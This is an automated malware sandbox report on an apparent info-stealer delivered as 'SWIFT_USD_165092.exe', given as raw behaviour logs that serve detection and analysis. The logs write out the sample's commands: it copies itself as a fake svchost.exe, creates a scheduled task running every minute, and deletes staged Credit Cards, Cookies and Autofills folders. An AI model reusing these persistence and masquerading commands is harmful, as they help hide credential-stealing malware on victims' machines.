                    Source: 0.2.SWIFT_USD_165092.exe.3e61140.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen
                    Source: SWIFT_USD_165092.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names
                    Source: 0.2.SWIFT_USD_165092.exe.3e61140.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names
                    Source: 1.2.SWIFT_USD_165092.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names
                    Source: 0.2.SWIFT_USD_165092.exe.3e61140.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 3108
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeCode function: 1_2_00D770101_2_00D77010
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeCode function: 1_2_00D778E01_2_00D778E0
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeCode function: 1_2_00D7ADE81_2_00D7ADE8
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeCode function: 1_2_00D7B4C81_2_00D7B4C8
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeCode function: 1_2_00D76CC81_2_00D76CC8
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeCode function: 1_2_06B42A1E1_2_06B42A1E
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeCode function: 1_2_06B416601_2_06B41660
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeCode function: 1_2_06B42D081_2_06B42D08
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeCode function: 1_2_06B43A681_2_06B43A68
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeCode function: 14_2_014D166014_2_014D1660
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeCode function: 14_2_014D2A1E14_2_014D2A1E
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeCode function: 14_2_014D3A6814_2_014D3A68
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeCode function: 14_2_014D2D0814_2_014D2D08
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeCode function: 14_2_053B701014_2_053B7010
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeCode function: 14_2_053BADE814_2_053BADE8
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeCode function: 14_2_053B78E014_2_053B78E0
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeCode function: 14_2_053B25E114_2_053B25E1
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeCode function: 14_2_053B6CC814_2_053B6CC8
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeCode function: 40_2_0576701040_2_05767010
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeCode function: 40_2_0576ADE840_2_0576ADE8
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeCode function: 40_2_057678E040_2_057678E0
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeCode function: 40_2_05766CC840_2_05766CC8
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeCode function: 0_2_01285020 CreateProcessAsUserA,0_2_01285020
                    Source: SWIFT_USD_165092.exe, 00000000.00000002.399782259.0000000002C51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOak.exe( vs SWIFT_USD_165092.exe
                    Source: SWIFT_USD_165092.exe, 00000000.00000002.398773484.0000000000FE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SWIFT_USD_165092.exe
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.545146168.0000000005659000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SWIFT_USD_165092.exe
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.533583456.0000000003B06000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZip.dll@ vs SWIFT_USD_165092.exe
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.548491096.0000000006AC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZip.dll@ vs SWIFT_USD_165092.exe
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.521846828.0000000000A3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SWIFT_USD_165092.exe
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.533583456.00000000039C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZip.dll@ vs SWIFT_USD_165092.exe
                    Source: SWIFT_USD_165092.exeBinary or memory string: OriginalFilenamemicrostub.exe, vs SWIFT_USD_165092.exe
                    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
                    Source: SWIFT_USD_165092.exeReversingLabs: Detection: 32%
                    Source: SWIFT_USD_165092.exeVirustotal: Detection: 35%
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeFile read: C:\Users\user\Desktop\SWIFT_USD_165092.exeJump to behavior
                    Source: SWIFT_USD_165092.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\SWIFT_USD_165092.exe C:\Users\user\Desktop\SWIFT_USD_165092.exe
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Users\user\Desktop\SWIFT_USD_165092.exe C:\Users\user\Desktop\SWIFT_USD_165092.exe
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C mkdir "C:\Users\user\AppData\Roaming\svchost
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C copy "C:\Users\user\Desktop\SWIFT_USD_165092.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost\svchost.exe C:\Users\user\AppData\Roaming\svchost\svchost.exe
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Users\user\AppData\Roaming\svchost\svchost.exe C:\Users\user\AppData\Roaming\svchost\svchost.exe
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C mkdir "C:\Users\user\AppData\Roaming\svchost
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C copy "C:\Users\user\AppData\Roaming\svchost\svchost.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Credit Cards
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Cookies
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Autofills
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\404d522a-62f5-4eb2-91f4-202649d15261
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 3108
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost\svchost.exe C:\Users\user\AppData\Roaming\svchost\svchost.exe
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Users\user\AppData\Roaming\svchost\svchost.exe C:\Users\user\AppData\Roaming\svchost\svchost.exe
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Credit Cards
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C mkdir "C:\Users\user\AppData\Roaming\svchost
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Cookies
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C copy "C:\Users\user\AppData\Roaming\svchost\svchost.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Autofills
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\88560075-49ce-438f-ba24-9980eb388270
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Users\user\Desktop\SWIFT_USD_165092.exe C:\Users\user\Desktop\SWIFT_USD_165092.exeJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C mkdir "C:\Users\user\AppData\Roaming\svchostJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /fJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C copy "C:\Users\user\Desktop\SWIFT_USD_165092.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exeJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Credit CardsJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\AutofillsJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\404d522a-62f5-4eb2-91f4-202649d15261Jump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /fJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Users\user\AppData\Roaming\svchost\svchost.exe C:\Users\user\AppData\Roaming\svchost\svchost.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C mkdir "C:\Users\user\AppData\Roaming\svchostJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /fJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C copy "C:\Users\user\AppData\Roaming\svchost\svchost.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Credit CardsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\CookiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\AutofillsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\88560075-49ce-438f-ba24-9980eb388270Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\AutofillsJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Users\user\AppData\Roaming\svchost\svchost.exe C:\Users\user\AppData\Roaming\svchost\svchost.exe
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C mkdir "C:\Users\user\AppData\Roaming\svchost
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C copy "C:\Users\user\AppData\Roaming\svchost\svchost.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeFile created: C:\Users\user\AppData\Roaming\svchostJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeFile created: C:\Users\user\AppData\Local\Temp\b7fbbbd0-cab3-4baf-a44e-1add614b7f64Jump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@82/46@10/4
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: 8410782f-b87a-410a-a803-6bf5b1c3ff77.1.dr, 77aa76e1-9e8d-4193-9624-f537e5e34ab5.14.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: SWIFT_USD_165092.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: 1.2.SWIFT_USD_165092.exe.720000.0.unpack, Log/Modules/SystemInfo/Info.csBase64 encoded string: 'lKf0D797r2Iyt1DnP/PTrLPjO4yO7cK6rxKN65nU62kv+P1cEg==', 'lKf0D797r2Iyt1DnNvPI9pD+M82z6su7r0besMvJ62kv+P1cEsvCbPMf', '+v+lV+Eysg995Q6iAuXIqZX1cOq17Mn12Ebe5Za2piZ9pqUSXJmN'
                    Source: 1.2.SWIFT_USD_165092.exe.720000.0.unpack, Log/IOHelper.csBase64 encoded string: '/eO5Wu0o3jBo7Qi1UeCW9eyxMtXnw8iw/UHRs8WHiTxrobIAH9bZcY5x8gT6FyBh00JY/BJdh6DvKOnJit0bdC0XKc2bUc3b8xK/BJDJYPomdL/ya0Q0R2SqqAOFlU6ySvVplhHRyqQ2cfF2Ss2R8NEMRHTZxYyW3ktDsxS/SOTbae6dDFlaUlfq4sfcrHhIiGXebAcihs7Kzw=='
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3524:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5760:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4704:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1716:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3480:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6988:120:WilError_01
